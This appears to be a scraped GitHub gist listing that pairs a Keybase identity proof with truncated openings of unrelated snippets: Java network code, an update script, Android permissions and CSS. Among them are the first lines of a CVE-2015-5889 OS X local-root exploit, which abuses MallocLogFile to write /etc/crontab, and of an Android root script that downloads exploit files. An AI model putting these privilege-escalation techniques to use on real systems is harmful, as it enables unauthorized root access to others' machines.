I hereby claim:
- I am arinerron on github.
- I am arinerron (https://keybase.io/arinerron) on keybase.
- I have a public key whose fingerprint is 02EC 5EE6 194D A341 A132 A295 FA6E 4332 B944 9910
To claim this, I am signing this object:
import java.util.*; | |
import java.util.regex.Pattern; | |
import java.net.*; | |
import java.io.*; | |
public class ChaosWebs { | |
public static double time = 6 * 60 * 60 * 1000; | |
public static String filename = ".last_post.txt"; | |
public static void main(String[] args) { |
==QPJJjYxJ0UapGbtJmCNUEb4JXdY9Cbn5ybvd2LvoDc0RHa |
import java.io.BufferedReader; | |
import java.io.InputStreamReader; | |
import java.net.URL; | |
import java.net.URLConnection; | |
import java.util.ArrayList; | |
import java.util.List; | |
import java.util.regex.Pattern; | |
public class Main { | |
public static void main(String[] args) throws Exception { |
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root | |
import os,time,sys | |
env = {} | |
s = os.stat("/etc/sudoers").st_size | |
env['MallocLogFile'] = '/etc/crontab' | |
env['MallocStackLogging'] = 'yes' |
#!/bin/bash | |
# Give the usual warning. | |
clear; | |
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
sleep 10; | |
clear; | |
# Download and extract exploit files. | |
echo "[INFO] Downloading exploit files from GitHub..."; |
android.permission.ACCESS_ALL_DOWNLOADS | |
android.permission.ACCESS_BLUETOOTH_SHARE | |
android.permission.ACCESS_CACHE_FILESYSTEM | |
android.permission.ACCESS_CHECKIN_PROPERTIES | |
android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY | |
android.permission.ACCESS_DOWNLOAD_MANAGER | |
android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED | |
android.permission.ACCESS_DRM_CERTIFICATES | |
android.permission.ACCESS_EPHEMERAL_APPS | |
android.permission.ACCESS_FM_RADIO |
import java.io.BufferedReader; | |
import java.io.IOException; | |
import java.io.InputStreamReader; | |
import java.io.PrintWriter; | |
import java.net.Socket; | |
import java.util.Scanner; | |
public class Main { | |
public static void main(String[] args) { |
# Arinerron's update script | |
# License: Nope. This code is easily recreatable, and I spent like 5 minutes writing it. I couldn't care less if you claimed this code as your or somehow made millions off of this or whatever. Have fun. :P | |
export COLOR_NC='\e[0m'; | |
export COLOR_GREEN='\e[0;32m'; | |
clear; | |
echo -e "$COLOR_GREEN""[Update] ""$COLOR_NC""Updating package listing..."; | |
sudo apt-get -qq update; | |
echo -e "$COLOR_GREEN""[Update] ""$COLOR_NC""Upgrading software..."; |
::-webkit-scrollbar { | |
width: 13px; | |
height: 13px; | |
} | |
::-webkit-scrollbar-button { | |
width: 0px; | |
height: 0px; | |
} |
I hereby claim:
To claim this, I am signing this object: